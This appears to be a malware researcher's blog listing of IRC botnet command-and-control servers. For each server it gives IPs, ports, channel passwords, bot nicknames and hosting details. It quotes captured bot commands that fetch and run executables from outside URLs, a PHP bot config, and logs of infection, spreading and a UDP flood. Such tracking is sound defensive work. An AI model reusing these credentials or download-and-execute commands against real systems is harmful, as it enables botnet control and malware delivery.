I got this email today in my spam folder: Dear valued PayPal Customer, We’re constantly working to make PayPal safer, simpler and more convenient for our customers. This means that from time to time we have to verify and keep up to date your account. It has come to our attention that your PayPal accountRead more...
kca.hopto.org(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)
Resolved : [kca.hopto.org] To [88.255.116.48] Server: 88.255.116.48:1453 Nick: new[iRooT-XP-AUT]990453 Username: 9904 Server Pass: KCA Joined Channel: #XXX with Password KCA Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html” Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!” Private Message to Channel #XXX: “[Download]: Executed Successfully” Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09SpreadingRead more...
Havoc.strangled.net(irc bot hosted in United States State College Comcast Business Communications Llc)
Resolved : [Havoc.strangled.net] To [173.167.76.199] Server: 173.167.76.199:6667 PASS KCA channel: #s sample here: !dl http://67.18.242.165/~corporac/med.exe hosting infos: http://whois.domaintools.com/173.167.76.199
4.byinter.net(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)
Resolved : [4.byinter.net] To [88.255.116.47] Download URLs http://72.32.8.40/iplocator.htm (www.geobytes.com) http://108.167.179.252/xxx.exe (www.grupobysoft.com) Outgoing connection to remote server: www.geobytes.com TCP port 80 C&C Server: 88.255.116.47:6667 Server Password: Username: TURKiSH Nickname: [N][DEU][XP][29218] Channel: #s (Password: KCA) #X, #XX, #XXX and #KCA Channeltopic: :!download http://www.grupobysoft.com/xxx.exe 1 hosting infos: http://whois.domaintools.com/88.255.116.47
uokm8.biz(Insomnia Bot hosted in Netherlands Tilburg nfinite Technologies Limited)
Found from Userbased Resolved : [uokm8.biz] To [192.162.136.148] server port channel Clients: I have 78 clients and 0 servers Local users: Current Local Users: 78 Max: 156 Global users: Current Global Users: 78 Max: 156 uokm8.biz:3281 #zyk# hosting infos: http://whois.domaintools.com/192.162.136.148
xsi.hi5fotos.info(irc botnet hosted in Netherlands Haarlem Fiberring B.v.)
Resolved : [xsi.hi5fotos.info] To [87.255.51.229] Remote Host Port Number xsi.hi5fotos.info 4042 NICK new[USA|XP|COMPUTERNAME]alzhcjt USER fu “” “lol” :fu JOIN #usakesh hosting infos: http://whois.domaintools.com/87.255.51.229
space.legendteam.info(irc botnet hosted in Russian Federation Keyweb Ag)
Resolved : [space.legendteam.info] To [95.169.187.66] Remote Host Port Number space.legendteam.info 1234 NICK zax-CD1A-1A40 USER zaxbot “” “” :zaxbot JOIN #zax MODE #zax +l 3 hosting infos: http://whois.domaintools.com/95.169.187.66
d.theimagebook.com(irc botnet hosted in China Nanchang Chinanet Jiangxi Province Network)
Resolved : [d.theimagebook.com] To [117.21.226.243] Remote Host Port Number d.theimagebook.com 7081 PASS eee Nick ljkng ssrr hvorp “” “chc” :hvorp possible channels: PRIVMSG #dpi :Err0r.. Nick n{US|XPa}pgfvioh Channel #ng pass ng00 channel #us hosting infos: http://whois.domaintools.com/117.21.226.243
brutinhoesilkster.servegame.com(Linux bots hosted in United States Dallas Limestone Networks Inc.)
Resolved : [brutinhoesilkster.servegame.com] To [63.143.41.236] var $config = array(“server”=>”brutinhoesilkster.servegame.com”, “port”=>”443”, “pass”=>””, “prefix”=>”[BET][RLZ]”, “maxrand”=>”4”, “chan”=>”#betorlz”, “chan2″=>””, “key”=>””, “modes”=>”+iB-x”, “password”=>”betinho”, “trigger”=>”.”, “hostauth”=>”*” // Clients: I have 297 clients and 0 servers Local users: Current local users: 297 Max: 607 Global users: Current global users: 297 Max: 607 Now talking in #betorlz ([[BET][RLZ]2706) [UdpFlood Finalizado!]: 1687 MB enviadosRead more...
esta4.info(ngr botnet hosted in United States San Jose Serveryou.com – Oow)
Resolved : [esta4.info] To [216.172.132.123] other domain names used from same guy: jer0002.in Resolved : [jer0002.in] To [216.172.132.123] jer0003.in Resolved : [jer0003.in] To [216.172.132.123] ratk01.com Resolved : [ratk01.com] To [216.172.132.123] Remote Host Port Number 199.15.234.7 80 216.172.132.123 1887 PASS powned NICK n{US|XPa}rqrrlpw USER rqrrlpw 0 0 :rqrrlpw JOIN #sbsb powned JOIN #XP JOIN #US NowRead more...